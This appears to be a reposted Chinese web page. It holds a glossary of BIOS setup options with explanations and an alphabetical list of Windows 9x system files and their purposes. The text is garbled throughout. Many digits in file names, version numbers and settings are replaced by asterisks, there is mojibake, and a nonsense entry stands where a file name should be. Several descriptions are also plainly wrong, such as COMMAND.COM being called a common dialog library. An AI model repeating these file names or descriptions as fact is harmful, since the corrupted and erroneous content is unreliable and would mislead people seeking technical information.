快印专题

快印专题

kuaiyinzt

当前位置:网站首页 > 快印专题 > 正文

详细的介绍WINDOWS系统文件的用途

吉印通 2022-07-05 04:12 2741 0

BIOS中英文对照表

  Time/System Time 时间/系统时间

  Date/System Date 日期/系统日期

  Level 2 Cache 二级缓存

  System Memory 系统内存

  Video Controller 视频控制器

  Panel Type 液晶屏型号

  Audio Controller 音频控制器

  Modem Controller 调制解调器(Modem)

  Primary Hard Drive 主硬盘

  Modular Bay 模块托架

  Service Tag 服务标签

  Asset Tag 资产标签

  BIOS Version BIOS版本

  Boot Order/Boot Sequence 启动顺序(系统搜索操作系统文件的顺序)

  Diskette Drive 软盘驱动器

  Internal HDD 内置硬盘驱动器

  Floppy device 软驱设备

  Hard-Disk Drive 硬盘驱动器

  USB Storage Device USB存储设备

  CD/DVD/CD-RW Drive 光驱

  CD-ROM device 光驱

  Modular Bay HDD 模块化硬盘驱动器

  Cardbus NIC Cardbus总线网卡

  Onboard NIC 板载网卡

  Boot POST 进行开机自检时(POST)硬件检查的水平:设置为"MINIMAL"(默认设置)则开机自检仅在BIOS升级,内存模块更改或前一次开机自检未完成的情况下才进行检查。设置为"THOROUGH"则开机自检时执行全套硬件检查。

  Config Warnings 警告设置:该选项用来设置在系统使用较低电压的电源适配器或其他不支持的配置时是否报警,设置为"DISABLED"禁用报警,设置为"ENABLED"启用报警

  Internal Modem 内置调制解调器:使用该选项可启用或禁用内置Modem。禁用(disabled)后Modem在操作系统中不可见。

  LAN Controller 网络控制器:使用该选项可启用或禁用PCI以太网控制器。禁用后该设备在操作系统中不可见。

  PXE BIS Policy/PXE BIS Default Policy

  PXE BIS策略:该选项控制系统在没有认证时如何处理(启动整体服务Boot Integrity Services(BIS))授权请求。系统可以接受或拒绝BIS请求。设置为"Reset"时,在下次启动计算机时BIS将重新初始化并设置为"Deny"。

  Onboard Bluetooth

  板载蓝牙设备

  MiniPCI Device

  Mini PCI设备

  MiniPCI Status

  Mini PCI设备状态:在安装Mini PCI设备时可以使用该选项启用或禁用板载PCI设备

  Wireless Control

  无线控制:使用该选项可以设置MiniPCI和蓝牙无线设备的控制方式。设置为"Application"时无线设备可以通过"Quickset"等应用程序启用或禁用,Fn+F2热键不可用。设置为"Fn+F2/Application"时无线设备可以通过"Quickset"等应用程序或Fn+F2热键启用或禁用。设置为"Always Off"时无线设备被禁用,并且不能在操作系统中启用。

  Wireless

  无线设备:使用该选项启用或禁用无线设备。该设置可以在操作系统中通过"Quickset"或"Fn+F2"热键更改。该设置是否可用取决于"Wireless Control"的设置。

  Serial Port

  串口:该选项可以通过重新分配端口地址或禁用端口来避免设备资源冲突。

  Infrared Data Port

  红外数据端口。使用该设置可以通过重新分配端口地址或禁用端口来避免设备资源冲突。

  Parallel Mode

  并口模式。控制计算机并口工作方式为"NORMAL"(AT兼容)(普通标准并行口)、"BI-DIRECTIONAL"(PS/2兼容)(双向模式,允许主机和外设双向通讯)还是"ECP"(Extended Capabilities Ports,扩展功能端口)(默认)。

  Num Lock

  数码锁定。设置在系统启动时数码灯(NumLock LED)是否点亮。设为"DISABLE"则数码灯保持灭,设为"ENABLE"则在系统启动时点亮数码灯。

  Keyboard NumLock

  键盘数码锁:该选项用来设置在系统启动时是否提示键盘相关的错误信息。

  Enable Keypad

  启用小键盘:设置为"BY NUMLOCK"在NumLock灯亮并且没有接外接键盘时启用数字小键盘。设置为"Only By Fn Key"在NumLock灯亮时保持embedded键区为禁用状态。

  External Hot Key

  外部热键:该设置可以在外接PS/2键盘上按照与使用笔记本电脑上的Fn键的相同的方式使用Scroll Lock键。如果您使用ACPI操作系统鏦in2000或WinXP,则USB键盘不能使用Fn键。仅在纯DOS模式下USB键盘才可以使用Fn键。设置为"SCROLL LOCK"(默认选项)启用该功能,设置为"NOT INSTALLED"禁用该功能。

  USB Emulation

  USB仿真:使用该选项可以在不直接支持USB的操作系统中使用USB键盘、USB鼠标及USB软驱。该设置在BIOS启动过程中自动启用。启用该功能后,控制转移到操作系统时仿真继续有效。禁用该功能后在控制转移到操作系统时仿真关闭。

  Pointing Device

  指针设备:设置为"SERIAL MOUSE"时外接串口鼠标启用并集成触摸板被禁用。设置为"PS/2 MOUSE"时,若外接PS/2鼠标,则禁用集成触摸板。设置为"TOUCH PAD-PS/2 MOUSE"(默认设置)时,若外接PS/2鼠标,可以在鼠标与触摸板间切换。更改在计算机重新启动后生效。

  Video Expansion

  视频扩展:使用该选项可以启用或禁用视频扩展,将较低的分辨率调整为较高的、正常的LCD分辨率。

  Battery

  电池

  Battery Status

  电池状态

  Power Management

  电源管理

  Suspend Mode

  挂起模式

  AC Power Recovery

  交流电源恢复:该选项可以在交流电源适配器重新插回系统时电脑的相应反映。

  Low Power Mode

  低电量模式:该选项用来设置系统休眠或关闭时所用电量。

  Brightness

  亮度:该选项可以设置计算机启动时显示器的亮度。计算机工作在电源供电状态下时默认设置为一半。计算机工作在交流电源适配器供电状态下时默认设置为最大。

  Wakeup On LAN

  网络唤醒:该选项设置允许在网络信号接入时将电脑从休眠状态唤醒。该设置对待机状态(Standby state)无效。只能在操作系统中唤醒待机状态。该设置仅在接有交流电源适配器时有效。

  Auto On Mod 自动开机模式:注意若交流电源适配器没有接好,该设置将无法生效。该选项可设置计算机自动开机时间,可以设置将计算机每天自动开机或仅在工作日自动开机。设置在计算机重新启动后生效。

  Auto On Time 自动开机时间:该选项可设置系统自动开机的时间,时间格式为2*小时制。键入数值或使用左、右箭头键设定数值。设置在计算机重新启动后生效。

  Dock Configuration 坞站配置

  Docking Status 坞站状态

  Universal Connect 通用接口:若所用操作系统为WinNT*.0或更早版本,该设置无效。如果经常使用不止一个戴尔坞站设备,并且希望最小化接入坞站时的初始时间,设置为"ENABLED"(默认设置)。如果希望操作系统对计算机连接的每个新的坞站设备都生成新的系统设置文件,设置为"DISABLED"。

  System Security 系统安全

  Primary Password 主密码

  Admin Password

  管理密码

  Hard-disk drive password(s) 硬盘驱动器密码

  Password Status 密码状态:该选项用来在Setup密码启用时锁定系统密码。将该选项设置为"Locked"并启用Setup密码以放置系统密码被更改。该选项还可以用来放置在系统启动时密码被用户禁用。

  System Password 系统密码

  Setup Password Setup密码

  Post Hotkeys 自检热键:该选项用来指定在开机自检(POST)时屏幕上显示的热键(F2或F12)。

  Chassis Intrusion

  机箱防盗:该选项用来启用或禁用机箱防盗检测特征。设置为"Enable-Silent"时,启动时若检测到底盘入侵,不发送警告信息。该选项启用并且机箱盖板打开时,该域将显示"DETECTED"。

  Drive Configuration

  驱动器设置

  Diskette Drive A: 磁盘驱动器A:如果系统中装有软驱,使用该选项可启用或禁用软盘驱动器

  Primary Master Drive 第一主驱动器

  Primary Slave Drive 第一从驱动器

  Secondary Master Drive 第二主驱动器

  Secondary Slave Drive 第二从驱动器

  IDE Drive UDMA 支持UDMA的IDE驱动器:使用该选项可以启用或禁用通过内部IDE硬盘接口的DMA传输。

  Hard-Disk drive Sequence 硬盘驱动器顺序

  System BIOS boot devices 系统BIOS启动顺序

  USB device USB设备

  Memory Information 内存信息

  Installed System Memory 系统内存:该选项显示系统中所装内存的大小及型号

  System Memory Speed

  内存速率:该选项显示所装内存的速率

  System Memory Channel Mode 内存信道模式:该选项显示内存槽设置。

  AGP Aperture AGP区域内存容量:该选项指定了分配给视频适配器的内存值。某些视频适配器可能要求多于默认值的内存量。

  CPU information CPU信息

  CPU Speed CPU速率:该选项显示启动后中央处理器的运行速率

  Bus Speed 总线速率:显示处理器总线速率

  Processor 0 ID 处理器ID:显示处理器所属种类及模型号

  Clock Speed 时钟频率

  Cache Size 缓存值:显示处理器的二级缓存值

  Integrated Devices(LegacySelect Options) 集成设备

  Sound 声音设置:使用该选项可启用或禁用音频控制器

  Network Interface Controller

  网络接口控制器:启用或禁用集成网卡

  Mouse Port 鼠标端口:使用该选项可启用或禁用内置PS/2兼容鼠标控制器

  USB Controller USB控制器:使用该选项可启用或禁用板载USB控制器。

  PCI Slots PCI槽:使用该选项可启用或禁用板载PCI卡槽。禁用时所有PCI插卡都不可用,并且不能被操作系统检测到。

  Serial Port 1 串口1:使用该选项可控制内置串口的操作。设置为"AUTO"时,如果通过串口扩展卡在同一个端口地址上使用了两个设备,内置串口自动重新分配可用端口地址。串口先使用COM1,再使用COM2,如果两个地址都已经分配给某个端口,该端口将被禁用。

  Parallel Port 并口:该域中可配置内置并口

  Mode 模式:设置为"AT"时内置并口仅能输出数据到相连设备。设置为PS/2、EPP或ECP模式时并口可以输入、输出数据。这三种模式所用协议和最大数据传输率不同。最大传输速率PS/2EPPECP。另外,ECP还可以设计DMA通道,进一步改进输出量。

  I/O Address 输入/输出地址

  DMA Channel DMA通道:使用该选项可以设置并口所用的DMA通道。该选项仅在并口设置为"ECP"时可用。

  Diskette Interface 磁盘接口:使用该选项可以设置内置软盘驱动器的操作。设置为AUTO时,若装有软驱,则内置磁盘控制器被禁用。若没有检测到磁盘控制器,则启用内置控制器。

  PC Speaker 系统喇叭:使用该选项可启用或禁用系统喇叭

  Primary Video Controller 主视频控制器:使用该选项可以在启动过程中指定视频控制器。设置为"AUTO"时若装有内置显卡,系统可以使用。否则系统将使用板载视频控制器。设置为"Onboard"时系统总是使用板载控制器

  Onboard Video Buffer 板载显卡缓存

  Report Keyboard Errors

  键盘报错

  Auto Power On 自动开机

  Auto Power On Mode 自动开机模式

  Auto Power On Time 自动开机时间

  Remote Wake Up 远程唤醒:该选项设置为"ON"时,若网卡或有远程唤醒功能的调制解调器收到唤醒信号时,系统将被唤醒。该选项设置为"On w/Boot to NIC 时",系统启动时首先尝试网络启动。

  Fast Boot 快速启动:该选项在操作系统请求精简启动时系统启动的速度。

  IDE Hard Drive Acoustics Mode IDE硬盘声音模式

  System Event Log 系统事件日志

  详细的介绍了WINDOWS系统文件的用途,我想各位保存一份以后说不定会有用吧

  A ↑

  ACCESS.CHM - Windows帮助文件

  ACCSTAT.EXE - 辅助状态指示器

  ADVAPI*2.DLL - 高级Win*2应用程序接口

  AHA1**X.MPD - SCSI驱动程序

  AM1*00T.VXT - 网卡驱动程序

  AM2100.DOS - 网卡驱动程序

  APPSTART.ANI - 动画光标

  APPS.HLP - Windows帮助文件

  AUDIOCDC.HLP - "易码编码解码器"帮助文件

  AWARDPR*2.EXE - 增加打印机工具

  B ↑

  BIGMEM.DRV - BIGMEM虚拟设备

  BILLADD.DLL - 动态链接库(支持MSW)

  BIOS.VXD - 即插即用BIOS接口

  BUSLOGIC.MPD - SCSI驱动程序

  C ↑

  CALC.EXE - 计算器应用程序

  CANNON*00.DRV - 佳能打印机驱动程序

  CHOICE.COM - MSDOS命令

  CHS1*.FON - 字体文件(1*点阵中文)

  CANYON.MID - MIDI文件例子

  CARDDRV.EXE - PCMCIA支持程序

  CDFS.VXD - CDROM文件系统

  CDPLAYER.EXE - CD播放器应用程序

  CDPLAYER.HLP - CD播放器帮助文件

  CHIPS.DRV - 芯片技术显示驱动程序

  CHKDSK.EXE - DOS磁盘检查工具

  CHOOSUSR.DLL - 网络客户

  CHOKD.WAV - 声音文件例子

  CIS.SCP - 脚本文件(演示如何建立与Compuserve的PPP连接)

  CLAIRE~1.RMI - MINI序列

  CLIP.INF - 安装信息文件(剪粘板查看器)

  CLOSEWIN.AVI - 影片剪辑(AVI)(如何关闭窗口)

  CMC.DLL:Mail - API1.0公共信息调用

  COMBUFF.VXD - COM端虚拟设备

  COMCTL*2.DLL - *2位Shell组件

  COMDLG*2.DLL - *2位公共对话库

  COMIC.TIF - TrueType字体文件(Comic Sans Ms)

  COMMAND.COM - 公共对话库

  COMMDLG.DLL - 1*位公共对话库

  COMMON.HLP - OLE帮助文件

  COMPOBJ.DLL - OLE1*/*2互*作库

  CONAGEN.EXE - *2位控制支持

  CONFAPI.DLL - Microsoft网络组件

  CONFIG.SYS - 配置文件

  CONFIG.TXT - 自述文件(配置文件中如何使用命令)

  CONTROL.EXE - "控制面板"应用程序

  COOL.DLL - 统一资源定位文件

  COPY.INF - 安装信息文件

  CP-12*0.NLS - 自然语言支持文件

  CPQNDIS.DOS - 网卡驱动程序

  CPQNDIS*.VXD - Compaq以太控制器NDIS驱动程序

  CR*2*0.EXE - DOS*.22中文版CR*2*0打印机驱动程序

  CRTDLL.DLL - Microsoft C运行时间库

  CSETUP.EXE - MSDOS*.22中文设置程序

  CSETUP.WIN - CSetup.exe支持文件

  CSMAPPER.SYS - 系统文件(支持PCMCIA)

  CSPMAN.DLL - 动态链接库(SoundBlaster 1* Driver)

  CTRLPAN.EXE - MSDOS命令(系统控制台程序)

  CTRLPAN.EXE - MSDOS*.22中文版控制程序

  D ↑

  DBLBVFF.SYS - 双缓冲驱动程序

  DC21X*.SYS - NDIS*驱动程序

  DCIMAN.DLL - 显示控制接口

  DCIMAN*2.DLL - 显示控制接口

  DDEML.DLL - DDE信息库

  DEBMP.DLL - 光栅显示设备

  DEBUG.EXE - Debug调试工具

  DECPSMW*.INF - 安装信息文件(DEC打印机安装)

  DECLAN.VXD - DECLAN网卡驱动程序

  DEFRAG - 打开"选定驱动器"窗口

  DEL.INF - 安装信息文件

  DELTEMP.COM - 初始化帮助工具

  DELTREE.EXE - 删除目录工具

  DEMET.DLL - 向量显示工程

  DESKCP1*.DLL - 1*位桌面控制面板

  DESKTOP.MSN - Microsoft网络组件

  DESS.DLL - 表格显示工程

  DEWP.DLL - 字处理显示工程

  DIALER.CNT - 对话帮助

  DIALER.EXE - 电话拨号程序

  DIALER.HLP - 电话拨号帮助文件

  DIALMON.EXE - 拨号监视程序(IE2.0)

  DIBENG.DLL - 独立设备的位同工程

  DICONIX.DRX - 打印机驱动

  非常棒哦^__^.WAN - 声音文件例子

  DIRECTCC.EXE - 直接线缆连接应用程序

  DISKCOMP - 磁盘比较工具

  DISKCOPY.COM - 磁盘拷贝工具

  DISKDRV.INF - 安装信息

  DISPLAY.TXT - 显示卡README文件

  DMCOLOR.DLL - 通用打印驱动程序彩打支持库

  DOSKEY.COM - DOS命令

  DOSX.EXE - MSDOS配置程序

  DRAGDROP.AVI - 影片剪辑(AVI)(如何使用拖拽)

  DRIVER.SYS - DOS驱动程序

  DRVSPACE.EXE - 磁盘压缩工具

  DRVSPACE.HLP - 磁盘空间管理帮助文件

  E ↑

  EDIT.COM - DOS文字编辑程序

  EDLIN.EXE - DOS行编辑器

  EE1*.VXD - 虚拟设备驱动程序

  EISA.VXD - 即插即用EISA总线计数器

  EK**0C.ICM - 打印机简介

  EMM***.EXE - 扩展内存管理程序

  ENABLE.INF - 初始化信息

  ENGCT.EXE - MSN支持文件

  ESCP2*SC.DRV - 设备驱动程序

  EUDCEDIT.CNF - 帮助索引文件(造字程序)

  EUDCEDIT.EXE - 造字程序

  EUDCEDIT.HLP - 帮助文件(造字程序)

  EUDCEDIT.INF - 安装信息文件(造字程序)

  EVX1*.DOS - 网卡驱动程序

  EWRK*.DOS - 网卡驱动程序

  EWRK*.SYS - 网卡驱动程序

  EXCEL.XLS - Excel*.0文件模板

  EXCEL*.XLS - Excel*.0文件模板

  EXCHANGE.TXT - Inbox和Exchange的自述文件

  EXCHNG.CNT - Mail/Exchange帮助文件内容

  EXCHNG.HLP - Mail/Exchange组件

  EXCHNG*2.EXE - 对用户的交换机作初始设置

  EXPLORER.AVI - 影片剪辑(AVI)(如何使用资源管理器)

  EXPLORER.EXE - "资源管理器"应用程序

  EXPO.HLP - 帮助文件(产品信息)

  EXPOSTRT.EXE - 产品信息应用程序

  EXTRACT.EXE - 解压缩工具

  EXTRA.TXT - 自述文件(联机访问附加文件)

  F ↑

  FAQ.TXT - 疑难解答自述文件

  FAXCODEC.DLL - 传真编码/译码器

  FAXCOVER.EXE - 封面编辑器

  FC.EXE - DOS命令,比较两个文件

  FD1*-700.MPD - SCSI驱动程序

  FD*XX.MPD - SCSI驱动程序

  FDISK.EXE - DOS命令,在硬盘上建立、删除及显示当前分区

  FILESEC.VXD - 文件存取控制管理器

  FILEXFER.CNT - 文件传输帮助文件内容

  FILEXFER.EXE - Microsoft文件传输

  FIND.AVI - 影片剪辑(如何使用查找)

  FIND.EXE - 寻找指定字符串命令

  FINDMVI.DLL - 媒体视觉支持

  FINSTALL.DLL - 字库安装程序

  FINSTALL.HLP - 字库安装帮助文件

  FLSIMTD.VXD - PCMCIA支持

  FLSIMTD.VXD - PCMCIA支持

  FONT1*.EXE - DOS*.22中文版1*点阵字体驱动程序

  FONTS.INF - 字体选择初始化信息

  FONTVIEW.EXE - 字体浏览程序

  formAT.COM - DOS磁盘格式化工具

  FOUTLINE.EXE - 轮廓字体驱动程序

  FRAMEBUF.DRV - SVGA显示器驱动程序

  FTE.DLL - 声音浏览文件传输工程文件

  FTP.EXE - 文件传输协议TCP工具

  FURELI~1.RMI - MINI序列

  G ↑

  GBK.TXT - 中文Windows9*GBK代码集字符定义表

  GDI.EXE - 简版WIN*.1图形界面

  GDI*2.DLL - *2位GDI图形界面

  GENERAL.IDF - 一般MIDI指示器

  GRPCONV.EXE - Windows程序组转换器

  GUIDE.EXE - 应用程序(MSN)

  H ↑

  HARDWARE.TXT - 硬件自述文件

  HOSTS.SAM - TCP配置

  HPCLRLSK.ICM - 打印简介

  HPDESK.ICM - 打印机简介表

  HPDSKJET.DRV - 打印机驱动程序

  HPEISA.VXD - 网络适配器驱动程序

  HPJAHLP.CNT - JetAdmin程序帮助文件

  HPJD.DLL - HPJetAdmin支持程序

  HPLAN.DOS - 网络适配器驱动程序

  HPLJ*00.DRV - HPLJ*00DPI打印机驱动程序

  HPLJ*00.EXE - MSDOS命令(HP打印机驱动)

  HPLJ-*1.SPD - 打印机驱动程序

  HPLJ*00.DRV - HPLJ*00DPI打印机驱动程序

  HPLJP-V*.INF - 打印机安装信息

  HPNETPRN.INF - HPJetAdmin支持程序

  HPPJXL*1.SPD - 打印机驱动程序

  HPPLOT.DRV - 打印机驱动程序

  HPPLOT.HLP - 打印机驱动程序帮助文件

  HPPRARBK.DLL - HPJetAdmin支持程序

  HPPRARRK.HLP - HPJetAdmin支持程序帮助文件

  HPVCM.HPM - 打印机驱动程序

  HSFLOP.PDR - HSFLOP虚拟设备

  HTICONS.DLL - 终端设备动态链接库

  HYPERTRM.CNT - 终端设备帮助文件

  HYPERTRM.EXE - 终端设备应用程序

  HYPERTRM.HLP - "超级终端"帮助

  HZKBD.EXE - 常用输入方法程序

  HZVIO9*.EXE - 显示驱动程序

  I ↑

  I*2*9*.DOS - 网络适配器驱动程序

  IB*01917.SPD - 打印机驱动程序

  IBM20*70.SPD - 打印机驱动程序

  IBM20K.DOS - 网络适配器驱动程序

  ICM*2.DLL - 图象颜色匹配程序

  ICMOI.DLL - 用户界面颜色匹配程序

  ICONLIB.DLL - 图符库

  IEXPLORE.CNT - 帮助索引文件(IE)

  IEXPLORE.EXE - InternetExplore

  IEXPLORE.HLP - 帮助文件(IE)

  IFSHLP.SYS - 文件系统安装帮助文件

  IFSMGR.VXD - 文件系统安装管理程序

  IMAGEOIT.EXE - 图象编辑器光标程序

  IMCLIENT.DLL - Microsoft网络组件

  IME.CNT - 帮助索引文件(中文输入法)

  IME.HLP - Windows帮助文件

  IME.INF - 安装信息文件(中文输入法)

  IMEGEN.CNF - 帮助索引文件(输入法生成器)

  IMEGEN.EXE - 输入法生成器

  IMEGEN.HLP - 帮助文件(输入法生成器)

  IMEINFO.INI - 输入法初始化文件

  IMM*2.DLL - WIN*2IMM应用程序界面

  INBOX.EXC - 邮件组件

  INDICDLL.DLL - 多语言组件

  INET.TXT - IE自述文件

  INET1*.DLL - 动态链接库(支持IE2.0)

  INETAB*2.DLL - 动态链接库(支持Internet mail)

  INETCFG.DLL - 动态链接库(支持IE2.0)

  INETCPL.CPL - 控制面板文件(配置IE2.0)

  INETMAIL.INF - 安装信息文件(Internet mail)

  INETWIZ.EXE - Internet安装向导

  INformS.WPF - 样板文件

  INSTBE.BAT - Microsoft网络组件

  INSTDICT.EXE - MSDOS命令(输入法安装程序)

  INTB.VXD - 1*号中断虚拟设备

  INTL.CPL - 控制面板

  INT-MAIL.CNT - 帮助索引文件(Internet mail)

  IOS.INI - 设置需要安全保护的程序

  IOSCLASS.DLL - CDROM安装程序

  IRMATR.DOS - 网络适配器驱动程序

  ISAPNP.VXD - ISA总线即插即用程序

  J ↑

  JOY.CPL - 游戏杆控制面板

  JOYSTICK.INF - 多媒体安装信息

  JP**0.DRV - 打印机驱动程序

  JUNGLE~1.WAV - 声音文件

  K ↑

  KBDBE.KBD - 比利时键盘格式

  KBDBR.KBD - 巴西键盘格式

  KBDCA.KBD - 法国、加拿大键盘格式

  KBDOS.KBD - 美国键盘格式

  KDCOLOR1.SPD - 打印机驱动程序

  KERNEL*2.DLL - *2位内核

  KEYB.COM - 将控制键盘程序装入内存

  KODAKCE.ICM - 柯达ICC配置文件

  KRNL***.EXE - Core应用程序

  L ↑

  LABEL.EXE - DOS命令,设置磁盘名称

  LFNBK.EXE - 长文件名备份文件

  LFNBK.TXT - LFNBK的自述文件

  LICENSE.HLP - Windows帮助文件

  LMSCRIPT.EXE - LAN管理器文稿处理程序

  LOGIN.EXE - Win9*登录NetWare文件

  LQ1*00K.EXE - LQ1*00K打印驱动程序

  M ↑

  MAILMSG.DLL - 微软网络组件

  MAILOPT.INF - MAIL/MAPI设置文件

  MAPI.DLL - Mail/Exchange组件

  MCIAVI.DRV - 多媒体驱动程序

  MCICDA.DRV - MCICD声音驱动程序

  MCIOLE.DLL - MCIOLE句柄

  MCIPIONR.DRV - MCI光盘驱动程序

  MCISEQ.DRV - MCI定序器驱动程序

  MCIVISCA.DRV - MCIVCR驱动程序

  MCIWAVE.DRV - MCI Ware驱动程序

  MDMNOKIA.INF - 安装信息文件(modem)

  MDMNOVA.INF - 安装信息文件(modem)

  MDMVV.INF - 安装信息文件(modem)

  MEMMAKER.EXE - 内存管理程序

  MEMMAKER.INF - 内存管理程序设置信息

  MFCUIA*2.DLL - OLEI公共对话动态链接库

  MIDI.INF - 即插即用MIDI设备信息

  MINET*2.DLL - 支持Internet Mail动态链接库

  MKECR*XX.MPD - SCSI驱动程序

  ML*XEC1*.EXE - 应用程序(MAPI)

  MLSHEXT.DLL - 微软核扩展库

  MMCI.DLL - 媒体类安装程序

  MMDEVLDR.VXD - 即插即用设备装载程序

  MMDRV.HLP - 多媒体帮助文件

  MMSOUND.DRV - 多媒体驱动程序

  MMSYSTEM.DLL - 多媒体系统内核

  MMTASK.TSK - 多媒体背景任务交换器

  MODE.COM - DOS命令

  MODERN.FON - 字体文件(modem)

  MORE.COM - DOS命令

  MOUSE.DRV - 鼠标驱动程序

  MOVEWIN.AVI - 影片剪辑(如何移动窗口)

  MPLAYER.EXE - 媒体播放程序

  MPR.DLL - WIN*2网络接口动态链接库

  MSAB*2.DLL - 微软网络地址簿

  MSBASE.INF - 设置信息

  MSCDEX.EXE - DOS MSCDEX CDROM扩展工具

  MSCDROM.INF - 类安装设置信息

  MSD.EXE - 微软诊断工具

  MSD.INI - 微软诊断初始化

  MSDET.INF - 系统检测设置信息

  MSDISP.INF - 显示设置信息

  MSDLG.EXE - 数据链接控制协议

  MSDOS.INF - 设置信息

  MSDOSDRV.TXT - 设备驱动程序自述文件

  MSFT.VRL - 统一资源定位文件

  MSGSRV*2.EXE - Windows*2位虚拟设备信息系统

  MSHDC.INF - 硬盘控制设置信息

  MSJSTICK.DRV - 即插即用游戏杆驱动程序

  MSMAIL.INF - Mail/MAPI初始化

  MSMOUSE.INF - 鼠标设置信息

  MSN.TXT - 微软网络自述文件

  MSNET*2.DLL - 微软*2位网络API库

  MSNEXCH.EXE - 微软网络设置程序

  MSNPSS.HLP - 微软网络帮助文件

  MSNVER.TXT - 微软网络帮助信息

  MSPAINT.EXE - 画图工具

  MSPCIC.DLL - PCMCIA类安装与控制工具

  MSPORTS.INF - 公共设置信息

  MSPP*2.DLL - 微软网络打印支持程序

  MSPWL*2.DLL - 口令清单管理库

  MSSBLST.DRV - 声霸卡驱动程序

  MSSBLSI.VXD - 声霸卡驱动程序

  MSSHRVI.DLL - 共享内核扩展程序

  MSSNDSYS.DRV - Windows声音系统驱动程序

  MSSP.VXP - Windows NT安全支持

  MSTCP.DLL - TCP用户界面

  MSVIEWUT.DLL - 显示设备服务数据链接库

  MTMMINIP.MPD - SCSI驱动程序

  MULLANG.INF - 多种语言字体支持设置信息

  MVIWAVE.DRV - 声音驱动程序

  N ↑

  NBTSTAT.EXE - TCP工具

  NDDEAPI.DLL - Workgroups DDE共享接口

  NDDENB.DLL - 微软网络DDE NetBIOS接口

  NDISHLP.SYS - 实模式NDIS支持驱动程序

  NET.EXE - 实模式网络客户软件

  NET.INF - 网络检测信息

  NET.MSG - 网络客户信息

  NET*COM.INF - 网络设置信息

  NETAMD.INF - 网络设置信息

  NETAPI.DLL - 网络应用程序接口动态链接库

  NETAPI*2.DLL - *2位网络API动态链接库

  NETAVXT.INF - MS内部传输文件

  NETBEUI.VXD - *2位NetBEUI协议

  NETBIOS.DLL - NetBIOSAPI库

  NETDCA.INF - 安装信息文件

  NETDDE.EXE - Windows网络动态数据交换

  NETDET.INI - NetWare检测文件

  NETDI.DLL - 网络设备安装

  NETH.MSG - 网络客户帮助信息

  NETOS.DLL - NOS检测DLL

  NETWATCH.EXE - 网络观测程序

  NETWORK.TXT - 网络信息自述文件

  NOTEPAD.EXE - 记事本应用程序

  NODRIVER.INF - 即插即用设备信息

  NOTEPAD.EXE - NOTEPAD文件

  NSCL.VXD - NSCL虚拟设备

  NW1*.DLL - NetWare客户

  NWAB*2.DLL - 地址簿支持动态链接库

  NWLSCON.EXE - 登录文稿控制台程序

  NWLSPROC.EXE - NetWare登录处理器

  NWNET*2.DLL - NetWare客户

  NWNP*2.DLL - NetWare组件

  NWREDIR.VXD - NetWare重定向

  NWSERVER.VXD - NCP服务

  NWSP.VXD - NCP服务安全提供

  OEMREVA.INF - 安装信息文件

  OLE2.DLL - OLE2.0动态链接库

  OLE2.INF - OLE设置信息

  OLE*2.DLL - *2位OLE2.0组件

  OLEAUT*2.DLL - OLE2-*2自动化

  OLECL1.DLL - 对象链接与嵌入客户库

  OLEDLG.DLL - Windows OLE2.0用户接口支持

  OLESVR.DLL - 对象链接与嵌入服务端库

  OLETHK*2.DLL - OLE形实替换程序库

  P ↑

  PACKAGER.EXE - 对象包装程序

  PARALINK.VXD - 远程网络存取并行口驱动程序

  PBRVSH.EXE - "画图"应用程序

  PDOS9*.BAT - 进入中文DOS状态

  PERF.VXD - 系统性能监视器

  PIFMGR.DLL - 程序信息文件管理服务程序

  PING.EXE - TCPPing工具

  PMSPL.DLL - LAN管理应用程序接口

  POWER.DRV - 高级电源管理驱动程序

  PPPMAC.VXD - Windows虚拟PPP驱动程序

  PRINT.EXE - DOS打印文件

  PRINTERS.TXT - 打印信息自述文件

  PROGMAN.EXE - 程序管理器

  PRTVPD.INF - 打印机升级设置信息

  Q ↑

  QUIKVIEW.EXE - 快速查看

  QUIT.EXE - 退出中文DOS状态

  R ↑

  README.TXT - Windows9*自述文件

  REGEDIT.EXE - 注册编辑器

  REGSERV.EXE - 远程注册

  REGWIE.EXE - 注册工具

  REGSERV.INF - 远程注册

  RESTORE.EXE - DOS命令

  RNAAPP.EXE - 拨号网络应用程序

  RNASERV.DLL - 远程网络存取服务

  RNASETUP.DLL - 远程网络存取设置动态链接库

  RNATHUNK.DLL - 远程网络存取转换支持动态链接库

  RNAUI.DLL - 远程网络存取用户接口DLLRNDSRV*2.DLL复制服务程序

  ROBOTZCL.WAV - 声音文件

  ROBOTZWI.WAV - 声音文件

  ROMAN.FON - 字型文件

  ROUTE.EXE - TCP/IP ROUTE命令

  RPCLTC1.DLL - 远程调用库

  RPCNS*.DLL - 远程调用库

  RPCPP.DLL - 远程调用打印驱动

  RPCRT*.DLL - 远程调用库

  RPCSS.EXE - 远程调用结点映象

  RPLBOOT.SYS - 远程程序装入

  RPLIMAGE.DLL - 远程程序装入磁盘映象器

  RSRC1*.DLL - 资源计量器

  RSRCMTR.EXE - 资源计量器

  RSRCMTR.INF - 资源计量器

  RUMOR.EXE - DDE测试/游戏

  RUNDLL.EXE - 把DLL作为应用程序运行

  RUNDLL*2.EXE - *2位壳组件

  S ↑

  S*.DRV - S*显示驱动

  S*.VXD - S*虚拟设备

  SACLIEN.DLL - Microsoft网络组件

  SAMPLEVIDEOS - 图象文件

  SAPNSP.DLL - Winsock数据连接库

  SAVE*2.COM - 安装时所需的TSR文件

  SB1*.VXD - 1*位声卡虚拟设备

  SB1*SND.DRV - 1*位声卡驱动

  SBAWE.VXD - AWE声卡虚拟设备

  SBAWE*2.DRV - AWE声卡驱动

  SBFM.DRV - 1*位声卡驱动

  SCANDISK.BAT - MSDOS*.x Scandisk的替代存根模块SCANDISK.BAT磁盘诊断工具

  SCANDISK.INI - 磁盘诊断工具

  SCANDISK.PIF - 安装磁盘诊断工具时的PIF文件

  SCANDSKW.EXE - 磁盘扫描工具

  SCANPROG.EXE - 磁盘扫描工具

  SCRNSAVE.SCR - 屏幕保护

  SCSI.INF - SCSI安装文件文件名描述

  SCSIIHLP.VXD - SCSI支持文件

  SCSIPORT.PDR - SCSI虚拟设备口

  SECUR*2.DLL - Microsoft Win*2安全服务

  SECURCL.DLL - Microsoft网络组件

  SEIKO2*E.DRV - 打印机驱动

  SEIKOSH9.DRV - 打印机驱动

  SERIAL.VXD - 串口VCOMM驱动器

  SERIFE.FON - 字型文件

  SERVER.HLP - 服务器帮助文件

  SETMDIR.EXE - SBS文件

  SETUP.BIN - 安装支持文件

  SETUP.BMP - 安装Wash位图文件

  SETUP.EXE - Windows9*安装程序

  SETUP.INF - 安装信息文件

  SETUP.TXT - 安装时的README文件

  SETUP*.DLL - 安装支持文件

  SETUPPP.INF - 安装信息

